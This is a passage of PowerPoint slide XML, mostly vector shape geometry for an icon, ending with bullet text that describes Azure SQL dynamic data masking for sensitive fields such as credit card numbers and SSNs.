                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1483" y="548"/>
                      <a:pt x="1497" y="547"/>
                      <a:pt x="1512" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1676" y="547"/>
                      <a:pt x="1809" y="680"/>
                      <a:pt x="1810" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1809" y="1008"/>
                      <a:pt x="1676" y="1141"/>
                      <a:pt x="1512" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FF8C00"/>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496" name="Freeform 495"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7183039" y="6646631"/>
                <a:ext cx="461492" cy="299403"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1443 w 1898"/>
                  <a:gd name="T1" fmla="*/ 464 h 1230"/>
                  <a:gd name="T2" fmla="*/ 1359 w 1898"/>
                  <a:gd name="T3" fmla="*/ 81 h 1230"/>
                  <a:gd name="T4" fmla="*/ 1177 w 1898"/>
                  <a:gd name="T5" fmla="*/ 47 h 1230"/>
                  <a:gd name="T6" fmla="*/ 1062 w 1898"/>
                  <a:gd name="T7" fmla="*/ 17 h 1230"/>
                  <a:gd name="T8" fmla="*/ 1171 w 1898"/>
                  <a:gd name="T9" fmla="*/ 135 h 1230"/>
                  <a:gd name="T10" fmla="*/ 1280 w 1898"/>
                  <a:gd name="T11" fmla="*/ 135 h 1230"/>
                  <a:gd name="T12" fmla="*/ 675 w 1898"/>
                  <a:gd name="T13" fmla="*/ 278 h 1230"/>
                  <a:gd name="T14" fmla="*/ 655 w 1898"/>
                  <a:gd name="T15" fmla="*/ 200 h 1230"/>
                  <a:gd name="T16" fmla="*/ 717 w 1898"/>
                  <a:gd name="T17" fmla="*/ 135 h 1230"/>
                  <a:gd name="T18" fmla="*/ 652 w 1898"/>
                  <a:gd name="T19" fmla="*/ 70 h 1230"/>
                  <a:gd name="T20" fmla="*/ 445 w 1898"/>
                  <a:gd name="T21" fmla="*/ 71 h 1230"/>
                  <a:gd name="T22" fmla="*/ 446 w 1898"/>
                  <a:gd name="T23" fmla="*/ 215 h 1230"/>
                  <a:gd name="T24" fmla="*/ 454 w 1898"/>
                  <a:gd name="T25" fmla="*/ 216 h 1230"/>
                  <a:gd name="T26" fmla="*/ 458 w 1898"/>
                  <a:gd name="T27" fmla="*/ 216 h 1230"/>
                  <a:gd name="T28" fmla="*/ 603 w 1898"/>
                  <a:gd name="T29" fmla="*/ 331 h 1230"/>
                  <a:gd name="T30" fmla="*/ 386 w 1898"/>
                  <a:gd name="T31" fmla="*/ 458 h 1230"/>
                  <a:gd name="T32" fmla="*/ 386 w 1898"/>
                  <a:gd name="T33" fmla="*/ 1230 h 1230"/>
                  <a:gd name="T34" fmla="*/ 911 w 1898"/>
                  <a:gd name="T35" fmla="*/ 885 h 1230"/>
                  <a:gd name="T36" fmla="*/ 911 w 1898"/>
                  <a:gd name="T37" fmla="*/ 885 h 1230"/>
                  <a:gd name="T38" fmla="*/ 921 w 1898"/>
                  <a:gd name="T39" fmla="*/ 883 h 1230"/>
                  <a:gd name="T40" fmla="*/ 931 w 1898"/>
                  <a:gd name="T41" fmla="*/ 880 h 1230"/>
                  <a:gd name="T42" fmla="*/ 935 w 1898"/>
                  <a:gd name="T43" fmla="*/ 877 h 1230"/>
                  <a:gd name="T44" fmla="*/ 943 w 1898"/>
                  <a:gd name="T45" fmla="*/ 870 h 1230"/>
                  <a:gd name="T46" fmla="*/ 945 w 1898"/>
                  <a:gd name="T47" fmla="*/ 869 h 1230"/>
                  <a:gd name="T48" fmla="*/ 1341 w 1898"/>
                  <a:gd name="T49" fmla="*/ 411 h 1230"/>
                  <a:gd name="T50" fmla="*/ 1358 w 1898"/>
                  <a:gd name="T51" fmla="*/ 486 h 1230"/>
                  <a:gd name="T52" fmla="*/ 1126 w 1898"/>
                  <a:gd name="T53" fmla="*/ 844 h 1230"/>
                  <a:gd name="T54" fmla="*/ 1898 w 1898"/>
                  <a:gd name="T55" fmla="*/ 844 h 1230"/>
                  <a:gd name="T56" fmla="*/ 652 w 1898"/>
                  <a:gd name="T57" fmla="*/ 428 h 1230"/>
                  <a:gd name="T58" fmla="*/ 769 w 1898"/>
                  <a:gd name="T59" fmla="*/ 797 h 1230"/>
                  <a:gd name="T60" fmla="*/ 652 w 1898"/>
                  <a:gd name="T61" fmla="*/ 428 h 1230"/>
                  <a:gd name="T62" fmla="*/ 459 w 1898"/>
                  <a:gd name="T63" fmla="*/ 799 h 1230"/>
                  <a:gd name="T64" fmla="*/ 679 w 1898"/>
                  <a:gd name="T65" fmla="*/ 798 h 1230"/>
                  <a:gd name="T66" fmla="*/ 88 w 1898"/>
                  <a:gd name="T67" fmla="*/ 844 h 1230"/>
                  <a:gd name="T68" fmla="*/ 483 w 1898"/>
                  <a:gd name="T69" fmla="*/ 563 h 1230"/>
                  <a:gd name="T70" fmla="*/ 348 w 1898"/>
                  <a:gd name="T71" fmla="*/ 867 h 1230"/>
                  <a:gd name="T72" fmla="*/ 386 w 1898"/>
                  <a:gd name="T73" fmla="*/ 888 h 1230"/>
                  <a:gd name="T74" fmla="*/ 386 w 1898"/>
                  <a:gd name="T75" fmla="*/ 1142 h 1230"/>
                  <a:gd name="T76" fmla="*/ 720 w 1898"/>
                  <a:gd name="T77" fmla="*/ 366 h 1230"/>
                  <a:gd name="T78" fmla="*/ 921 w 1898"/>
                  <a:gd name="T79" fmla="*/ 762 h 1230"/>
                  <a:gd name="T80" fmla="*/ 1214 w 1898"/>
                  <a:gd name="T81" fmla="*/ 844 h 1230"/>
                  <a:gd name="T82" fmla="*/ 1470 w 1898"/>
                  <a:gd name="T83" fmla="*/ 857 h 1230"/>
                  <a:gd name="T84" fmla="*/ 1525 w 1898"/>
                  <a:gd name="T85" fmla="*/ 886 h 1230"/>
                  <a:gd name="T86" fmla="*/ 1554 w 1898"/>
                  <a:gd name="T87" fmla="*/ 831 h 1230"/>
                  <a:gd name="T88" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T89" fmla="*/ 546 h 1230"/>
                  <a:gd name="T90" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T91" fmla="*/ 1142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98" h="1230">
                    <a:moveTo>
                      <a:pt x="1512" y="458"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1489" y="458"/>
                      <a:pt x="1466" y="460"/>
                      <a:pt x="1443" y="464"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1354" y="61"/>
                      <a:pt x="1336" y="47"/>
                      <a:pt x="1315" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1171" y="46"/>
                      <a:pt x="1147" y="41"/>
                      <a:pt x="1124" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1107" y="0"/>
                      <a:pt x="1079" y="0"/>
                      <a:pt x="1062" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1045" y="35"/>
                      <a:pt x="1045" y="63"/>
                      <a:pt x="1062" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1112" y="130"/>
                      <a:pt x="1165" y="134"/>
                      <a:pt x="1171" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="656" y="200"/>
                      <a:pt x="657" y="200"/>
                      <a:pt x="658" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="691" y="196"/>
                      <a:pt x="717" y="169"/>
                      <a:pt x="717" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="717" y="102"/>
                      <a:pt x="692" y="75"/>
                      <a:pt x="660" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="658" y="70"/>
                      <a:pt x="655" y="70"/>
                      <a:pt x="652" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="70"/>
                      <a:pt x="448" y="70"/>
                      <a:pt x="445" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="75"/>
                      <a:pt x="381" y="106"/>
                      <a:pt x="381" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="381" y="181"/>
                      <a:pt x="409" y="211"/>
                      <a:pt x="446" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="448" y="216"/>
                      <a:pt x="451" y="216"/>
                      <a:pt x="453" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="455" y="216"/>
                      <a:pt x="457" y="216"/>
                      <a:pt x="458" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="481" y="467"/>
                      <a:pt x="434" y="458"/>
                      <a:pt x="386" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="458"/>
                      <a:pt x="0" y="631"/>
                      <a:pt x="0" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1057"/>
                      <a:pt x="173" y="1230"/>
                      <a:pt x="386" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="1230"/>
                      <a:pt x="749" y="1079"/>
                      <a:pt x="769" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="915" y="884"/>
                      <a:pt x="918" y="884"/>
                      <a:pt x="921" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="922" y="883"/>
                      <a:pt x="923" y="883"/>
                      <a:pt x="924" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="926" y="882"/>
                      <a:pt x="928" y="881"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="933" y="879"/>
                      <a:pt x="934" y="878"/>
                      <a:pt x="935" y="877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="877"/>
                      <a:pt x="937" y="876"/>
                      <a:pt x="938" y="875"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="874"/>
                      <a:pt x="942" y="872"/>
                      <a:pt x="943" y="870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="944" y="870"/>
                      <a:pt x="944" y="870"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1222" y="549"/>
                      <a:pt x="1126" y="685"/>
                      <a:pt x="1126" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1126" y="1057"/>
                      <a:pt x="1299" y="1230"/>
                      <a:pt x="1512" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1725" y="1230"/>
                      <a:pt x="1898" y="1057"/>
                      <a:pt x="1898" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1898" y="631"/>
                      <a:pt x="1725" y="458"/>
                      <a:pt x="1512" y="458"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="652" y="428"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="755" y="684"/>
                      <a:pt x="692" y="586"/>
                      <a:pt x="602" y="525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="652" y="428"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="679" y="798"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="623" y="649"/>
                      <a:pt x="667" y="718"/>
                      <a:pt x="679" y="798"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="386" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="1141"/>
                      <a:pt x="88" y="1008"/>
                      <a:pt x="88" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="680"/>
                      <a:pt x="221" y="547"/>
                      <a:pt x="386" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="420" y="547"/>
                      <a:pt x="452" y="553"/>
                      <a:pt x="483" y="563"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="340" y="837"/>
                      <a:pt x="340" y="854"/>
                      <a:pt x="348" y="867"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="356" y="880"/>
                      <a:pt x="371" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659" y="1030"/>
                      <a:pt x="536" y="1141"/>
                      <a:pt x="386" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="921" y="762"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="921" y="762"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1512" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1348" y="1141"/>
                      <a:pt x="1215" y="1008"/>
                      <a:pt x="1214" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1215" y="725"/>
                      <a:pt x="1284" y="623"/>
                      <a:pt x="1385" y="575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1476" y="876"/>
                      <a:pt x="1493" y="888"/>
                      <a:pt x="1512" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1516" y="888"/>
                      <a:pt x="1521" y="888"/>
                      <a:pt x="1525" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1548" y="879"/>
                      <a:pt x="1561" y="855"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1483" y="548"/>
                      <a:pt x="1497" y="547"/>
                      <a:pt x="1512" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1676" y="547"/>
                      <a:pt x="1809" y="680"/>
                      <a:pt x="1810" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1809" y="1008"/>
                      <a:pt x="1676" y="1141"/>
                      <a:pt x="1512" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00BCF2"/>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grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Content Placeholder 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272397" y="2375274"/>
            <a:ext cx="5184292" cy="2977223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91403" tIns="124292" rIns="248583" bIns="124292"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342886" indent="-342886" algn="l" defTabSz="457181" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742919" indent="-285738" algn="l" defTabSz="457181" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1142952" indent="-228591" algn="l" defTabSz="457181" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600134" indent="-228591" algn="l" defTabSz="457181" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1200" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057314" indent="-228591" algn="l" defTabSz="457181" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>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a:lstStyle>
          <a:p>
            <a:pPr marL="342886" marR="0" lvl="0" indent="-342886" algn="l" defTabSz="621474" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1764" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Configuration made easy in the new Azure portal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342886" marR="0" lvl="0" indent="-342886" algn="l" defTabSz="621474" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1764" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Policy-driven at the table and column level for a defined set of users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342886" marR="0" lvl="0" indent="-342886" algn="l" defTabSz="621474" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1764" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Data masking applied in real-time to query results based on policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342886" marR="0" lvl="0" indent="-342886" algn="l" defTabSz="621474" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1960"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1764" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Multiple masking functions available (for example, full and partial) for various sensitive data categories (credit card numbers, SSN, </a:t>
            </a:r>
            <a:br>
